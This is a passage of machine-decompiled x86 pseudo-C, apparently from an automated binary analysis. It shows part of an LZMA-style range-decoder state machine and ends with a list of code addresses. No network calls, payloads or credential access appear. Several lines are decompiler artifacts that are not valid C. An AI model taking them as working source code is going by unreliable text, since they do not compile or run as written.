                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t122 = __ebp - 0x70;
                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t122;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L39:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      												goto L48;
                                                                                      											}
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												goto L54;
                                                                                      											}
                                                                                      											L41:
                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                      											__eax = __eax + 1;
                                                                                      											__eax = __eax << 8;
                                                                                      											__eax = __eax + __ebx;
                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edx;
                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L39;
                                                                                      											} else {
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											L46:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t156 = __ebp - 0x70;
                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t156;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											while(1) {
                                                                                      												L48:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                      													__ebx = _t170;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													goto L46;
                                                                                      												}
                                                                                      											}
                                                                                      											L54:
                                                                                      											_t173 = __ebp - 0x34;
                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      											__eflags =  *_t173;
                                                                                      											goto L55;
                                                                                      										case 0xf:
                                                                                      											L58:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t203 = __ebp - 0x70;
                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t203;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L60:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												L55:
                                                                                      												__al =  *(__ebp - 0x44);
                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      												goto L56;
                                                                                      											}
                                                                                      											L61:
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__edx = __ebx + __ebx;
                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                      											__esi = __edx + __eax;
                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                      												__ebx = _t217;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L60;
                                                                                      											} else {
                                                                                      												goto L58;
                                                                                      											}
                                                                                      										case 0x10:
                                                                                      											L109:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t365 = __ebp - 0x70;
                                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t365;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											goto L111;
                                                                                      										case 0x11:
                                                                                      											L69:
                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                      											while(1) {
                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                      												goto L133;
                                                                                      											}
                                                                                      										case 0x12:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											__eflags = __eax;
                                                                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      											goto L130;
                                                                                      										case 0x13:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												_t469 = __ebp - 0x58;
                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      												__eflags =  *_t469;
                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                      												L144:
                                                                                      												 *(__ebp - 0x7c) = 0x14;
                                                                                      												goto L145;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      											L130:
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											 *(__ebp - 0x40) = 3;
                                                                                      											goto L144;
                                                                                      										case 0x14:
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                      											 *(_t613 - 0x88) = _t533;
                                                                                      											goto L1;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      											__al = __al & 0x000000fd;
                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      											goto L120;
                                                                                      										case 0x16:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__eflags = __eax - 4;
                                                                                      											if(__eax >= 4) {
                                                                                      												_push(3);
                                                                                      												_pop(__eax);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x40) = 6;
                                                                                      											__eax = __eax << 7;
                                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											goto L145;
                                                                                      										case 0x17:
                                                                                      											L145:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											 *(__ebp - 0x50) = 1;
                                                                                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      											goto L149;
                                                                                      										case 0x18:
                                                                                      											L146:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t484 = __ebp - 0x70;
                                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t484;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L148:
                                                                                      											_t487 = __ebp - 0x48;
                                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      											__eflags =  *_t487;
                                                                                      											L149:
                                                                                      											__eflags =  *(__ebp - 0x48);
                                                                                      											if( *(__ebp - 0x48) <= 0) {
                                                                                      												__ecx =  *(__ebp - 0x40);
                                                                                      												__ebx =  *(__ebp - 0x50);
                                                                                      												0 = 1;
                                                                                      												__eax = 1 << __cl;
                                                                                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      												__eax =  *(__ebp - 0x7c);
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x88) = _t533;
                                                                                      													goto L1;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x50);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__esi = __edx + __eax;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__ax =  *__esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eax = __eax - __ecx;
                                                                                      												__edx = __edx + 1;
                                                                                      												__eflags = __edx;
                                                                                      												 *__esi = __ax;
                                                                                      												 *(__ebp - 0x50) = __edx;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L148;
                                                                                      											} else {
                                                                                      												goto L146;
                                                                                      											}
                                                                                      										case 0x19:
                                                                                      											__eflags = __ebx - 4;
                                                                                      											if(__ebx < 4) {
                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                      												L119:
                                                                                      												_t393 = __ebp - 0x2c;
                                                                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      												__eflags =  *_t393;
                                                                                      												L120:
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												_t400 = __ebp - 0x60;
                                                                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      												__eflags =  *_t400;
                                                                                      												goto L123;
                                                                                      											}
                                                                                      											__ecx = __ebx;
                                                                                      											__eax = __ebx;
                                                                                      											__ecx = __ebx >> 1;
                                                                                      											__eax = __ebx & 0x00000001;
                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                      											__al = __al | 0x00000002;
                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                      											__eflags = __ebx - 0xe;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__ebx >= 0xe) {
                                                                                      												__ebx = 0;
                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                      												L102:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__eax = __eax + __ebx;
                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                      													__eflags = __eax;
                                                                                      													L108:
                                                                                      													__ebx = 0;
                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                      													L112:
                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      														_t391 = __ebp - 0x2c;
                                                                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      														__eflags =  *_t391;
                                                                                      														goto L119;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__esi = __edi + __eax;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__ax =  *__esi;
                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                      														__ecx = 0;
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      														__ecx = 1;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      														__ebx = 1;
                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                      														__ebx = 1 << __cl;
                                                                                      														__ecx = 1 << __cl;
                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      														__cx = __ax;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eax = __eax - __ecx;
                                                                                      														__edi = __edi + 1;
                                                                                      														__eflags = __edi;
                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                      														 *__esi = __ax;
                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                      														0x800 = 0x800 - __ecx;
                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      														 *__esi = __dx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														L111:
                                                                                      														_t368 = __ebp - 0x48;
                                                                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      														__eflags =  *_t368;
                                                                                      														goto L112;
                                                                                      													} else {
                                                                                      														goto L109;
                                                                                      													}
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0xc);
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      													__ebx = __ebx | 0x00000001;
                                                                                      													__eflags = __ebx;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													L101:
                                                                                      													_t338 = __ebp - 0x48;
                                                                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      													__eflags =  *_t338;
                                                                                      													goto L102;
                                                                                      												} else {
                                                                                      													goto L99;
                                                                                      												}
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 4);
                                                                                      											__eax = __eax - __ebx;
                                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      											goto L108;
                                                                                      										case 0x1a:
                                                                                      											L56:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x68);
                                                                                      											__al =  *(__ebp - 0x5c);
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                                      											__ecx =  *(__ebp - 0x14);
                                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      											__eax = __ecx + 1;
                                                                                      											__edx = 0;
                                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t192;
                                                                                      											goto L79;
                                                                                      										case 0x1b:
                                                                                      											L75:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                                      												__eflags = __eax;
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											__cl =  *(__eax + __edx);
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                                      											 *(__eax + __edx) = __cl;
                                                                                      											__eax = __eax + 1;
                                                                                      											__edx = 0;
                                                                                      											_t274 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t274;
                                                                                      											__eax =  *(__ebp - 0x68);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											_t283 = __ebp - 0x64;
                                                                                      											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      											__eflags =  *_t283;
                                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                                      											L79:
                                                                                      											 *(__ebp - 0x14) = __edx;
                                                                                      											goto L80;
                                                                                      										case 0x1c:
                                                                                      											while(1) {
                                                                                      												L123:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												__cl =  *(__eax + __edx);
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                      												 *(__eax + __edx) = __cl;
                                                                                      												__eax = __eax + 1;
                                                                                      												__edx = 0;
                                                                                      												_t414 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t414;
                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      												__eflags =  *(__ebp - 0x30);
                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                      												 *(__ebp - 0x14) = _t414;
                                                                                      												if( *(__ebp - 0x30) > 0) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													L80:
                                                                                      													 *(__ebp - 0x88) = 2;
                                                                                      													goto L1;
                                                                                      												}
                                                                                      											}
                                                                                      											 *(__ebp - 0x88) = 0x1c;
                                                                                      											goto L170;
                                                                                      									}
                                                                                      								}
                                                                                      								L171:
                                                                                      								_t535 = _t534 | 0xffffffff;
                                                                                      								goto L172;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}













                                                                                      0x00000000
                                                                                      0x00407068
                                                                                      0x00407068
                                                                                      0x0040706c
                                                                                      0x00407095
                                                                                      0x0040709f
                                                                                      0x0040706e
                                                                                      0x00407077
                                                                                      0x00407084
                                                                                      0x00407087
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x00407420
                                                                                      0x004075cf
                                                                                      0x004075e5
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x004075f6
                                                                                      0x004075fd
                                                                                      0x00407601
                                                                                      0x00407601
                                                                                      0x0040742c
                                                                                      0x00407433
                                                                                      0x0040743b
                                                                                      0x0040743e
                                                                                      0x00407441
                                                                                      0x00407441
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406bec
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bf2
                                                                                      0x00000000
                                                                                      0x00406bfd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c06
                                                                                      0x00406c09
                                                                                      0x00406c0c
                                                                                      0x00406c10
                                                                                      0x00000000
                                                                                      0x00000000
